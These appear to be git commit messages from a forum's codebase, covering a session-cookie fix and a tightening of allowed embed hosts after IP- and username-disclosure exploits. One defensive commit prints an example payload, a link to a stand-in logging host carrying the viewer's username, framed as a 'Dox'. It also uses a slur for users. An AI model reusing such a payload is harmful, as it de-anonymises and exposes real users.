through some reason or another, people are somehow getting cookies that aren't prepended with a dot.
this is a problem because both sessions at, as best as I can tell, mix so it tries to read from a different cookie than we write to. this essentially "freezes" the session in place. users are unable to login, logout, signup, toggle poor mode, toggle NSFW, etc.
~~this attempts to delete bad session cookies (i.e. cookies with a domain that don't start with a dot).~~
~~we don't do this on "dotless" domains (and by extension localhost) because browser support for setting cookies on FQDNs that only have one dot has tenuous support among browsers anyway).~~
~~this *may* log some people out, but... their days of being able to do stuff on the site were numbered anyway.~~
**edit: as amazing as this thought was, browsers just wipe the entire cookies completely and there's no way to specifically target dotless cookies. for an issue that affects a few users, better to just tell them to clear their cookies. if *this* doesn't work, delete service-worker.js and be done with the whole service worker crap. forever. permanently. this PR also includes some QOL improvements.**
Co-authored-by: justcool393 <justcool393@gmail.com>
Reviewed-on: #50
Co-authored-by: justcool393 <justcool393@noreply.fsdfsd.net>
Co-committed-by: justcool393 <justcool393@noreply.fsdfsd.net>
Unlike the recent auto-embed exploits which have been patched, this
requires active user action. However our userbase, like all userbases,
contains quite a few retards and phoneposters who don't check links
before clicking.
Example exploit:
<a href="https://example.com/log?username=!YOU!">Bardfinn Dox</a>
Probably will break some peoples' profilecss and irritate the
newsposters, but in light of recent live proven exploits to disclose
user IP & username pairs to remote servers, the broad list of embed
hosts was unsustainable and impossible to prove safe.
We extend is_safe_url to allow whitelisting subdomains, specifically
to solve the s.lain.la open redirect exploit. Also, open media proxies
like external-content.duckduckgo.com were concerning enough, despite
likely being safe, to warrant removal. Anything infrequently used and
difficult to review, or has a reasonable alternative, was also removed.
In general: we want people to be rehosting, and if we want to allow
more external content, we need to run a media proxy. The central issue
is that any user-configurable 302 is a potential disclosure risk, and
Lord knows how many ways there were to get <arbitrarynewssite>.com to
do so. Maybe zero, but the problem is we just don't know.
!YOU! + an escape for `approved_embed_hosts` could let you grab the IP and username of everyone who views your comment
https://rdrama.net/post/129053/you-callout-thread/3191218?context=8#context
lain.la has a URL shortener that also works to get around embed hosts, fwiw
Co-authored-by: float trip <float-trip@rdrama.net>
Reviewed-on: #49
Co-authored-by: float-trip <float-trip@noreply.fsdfsd.net>
Co-committed-by: float-trip <float-trip@noreply.fsdfsd.net>
Aevann1
SneedBot
justcool393
Snakes
float-trip